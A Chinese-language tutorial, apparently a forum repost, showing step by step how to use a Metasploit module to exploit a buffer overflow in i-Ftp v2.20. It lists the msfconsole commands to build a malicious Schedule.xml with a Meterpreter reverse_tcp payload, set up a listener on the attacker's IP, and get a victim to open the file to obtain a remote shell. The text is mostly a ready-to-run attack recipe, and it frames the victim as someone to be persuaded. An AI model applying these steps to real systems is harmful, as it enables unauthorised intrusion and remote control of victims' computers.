使用i-FTP计划缓冲区溢出利用远程Windows PC

此模块利用i-Ftp v2.20中基于堆栈的缓冲区溢出漏洞,该漏洞由为计划下载设置的长时间值引起。通过说服受害者将特制的Schedule.xml文件放在i-FTP文件夹中,远程攻击者可以在系统上执行任意代码或导致应用程序崩溃。此模块已在Windows XP SP3上成功测试。
利用目标
i-Ftp v2.20
需求
攻击者:kali Linux
受害者PC:Windows XP 3
打开Kali终端类型  msfconsole
使用i-FTP计划缓冲区溢出利用远程Windows PC
现在输入  exploit use / windows / fileformat / iftp_schedule_bof
msf exploit(iftp_schedule_bof)> set payload windows / meterpreter / reverse_tcp
msf exploit(iftp_schedule_bof)> set lhost 192.168.0.107  (本地主机的IP)
msf exploit(iftp_schedule_bof)> exploit
使用i-FTP计划缓冲区溢出利用远程Windows PC
在我们成功生成恶意  xml文件后,它将存储在您的本地计算机上
/root/.msf4/local/schedule.xml
使用i-FTP计划缓冲区溢出利用远程Windows PC
将Schedule.xml复制到C:\ Program Files \ Memecode \ i.Ftp
现在我们需要设置一个监听器来处理攻击成功执行时受害者发送的反向连接。
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.107
exploit
现在 ,只要下载并打开它们,就会将您的schedule.xml文件发送  给受害者。现在您可以访问受害计算机上的meterpreter shell。
使用i-FTP计划缓冲区溢出利用远程Windows PC
使用i-FTP计划缓冲区溢出利用远程Windows PC
转载请注明本文链接: http://www.mayidui.net/t2405.html
话题: 缓冲区溢出
游客
登录后才可以回帖,登录 或者 注册